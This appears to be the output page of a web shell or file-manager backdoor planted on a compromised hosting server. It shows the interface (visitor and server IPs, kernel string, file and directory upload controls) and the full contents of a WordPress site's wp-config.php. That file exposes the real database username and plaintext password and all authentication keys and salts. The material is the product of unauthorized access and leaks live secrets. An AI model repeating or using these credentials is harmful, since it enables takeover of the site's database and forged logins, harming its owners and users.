Your IP :
44.211.84.185
Server IP :
185.51.66.243
Server :
Linux mail.silverfrog.eu 2.6.32-954.3.5.lve1.4.89.el6.x86_64 #1 SMP Sat May 7 10:18:11 UTC 2022 x86_64
Server Software :
LiteSpeed
PHP Version :
8.0.26
Add File :
Submit
Add Directory :
Submit
Dir :
~
/
home
/
metujump
/
public_html
/
meetup.metropolitan.hu
/
View File Name :
wp-config.php
<?php //Begin Really Simple SSL session cookie settings @ini_set('session.cookie_httponly', true); @ini_set('session.cookie_secure', true); @ini_set('session.use_only_cookies', true); //END Really Simple SSL define( 'WPCACHEHOME', '/home/metujump/public_html/meetup.metropolitan.hu/wp-content/plugins/wp-super-cache/' ); define( 'WP_CACHE', true ); /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ // ** MySQL settings ** // /** The name of the database for WordPress */ define( 'DB_NAME', "metujump_meetup" ); /** MySQL database username */ define( 'DB_USER', "metujump_meetup" ); /** MySQL database password */ define( 'DB_PASSWORD', "Metropolitan1149" ); /** MySQL hostname */ define( 'DB_HOST', "localhost" ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /** * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'k3DeuvX+40Ot+Ii$.tgRnuh,-]ZhgM%%[/G!o8oV&But[]]T9qUeXg{%23bo-`y8' ); define( 'SECURE_AUTH_KEY', 'Z(-MC;*0nzta*U`Hm*)|ji|>&)z#bEx,?5w{t-BL1.v!bKbpGlD%?fWVl{tKNR(t' ); define( 'LOGGED_IN_KEY', 'r!ZfnGhDuH*TSgRq?)S.{p~X:I&HD2xH^>*dz#LN*WM]|vz8bKZ`0R*=cXG5+C{J' ); define( 'NONCE_KEY', '.r{advv~B$?q#}$8R><9&M//Z;SAfeLc#iJWCr%%U-ZFVYaYad2i{DsH(CHW}1W6' ); define( 'AUTH_SALT', 'uA& u;Q.}@lG^8B|z~!nn$C)W0e+DO(+c|%ugr6:SG)?%9HmjWRaADN(sD.B1@C3' ); define( 'SECURE_AUTH_SALT', 'HILE%{}isCy6K#zzOWB5X>#.?BipDS^ pB]WI3AxrIL6~+6?v5*EQS~HcOS@LZ!g' ); define( 'LOGGED_IN_SALT', 'Vgl#lUezCL.m{*^ 8Ad{]$uv_(RPU>&wJrP pyXQ/-9/x1&5E5$@OU|5cSRJ6K,[' ); define( 'NONCE_SALT', 'RWh2#-U}nSMxUzb#SPzv);9@;S/Z3Us~5vb5B(0x*:gJ@9{ti0}S$<yI4%9JgrBT' ); define( 'WP_CACHE_KEY_SALT', '4)mo^/eiK6AqD1`HHY<lMxZ+N,*>Uz-$Z.Or1aLqZ)5rA2*M5PG(&C[2/pV!A*x0' ); /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; define('WP_MEMORY_LIMIT','512M'); set_time_limit(600); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) define( 'ABSPATH', dirname( __FILE__ ) . '/' ); /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';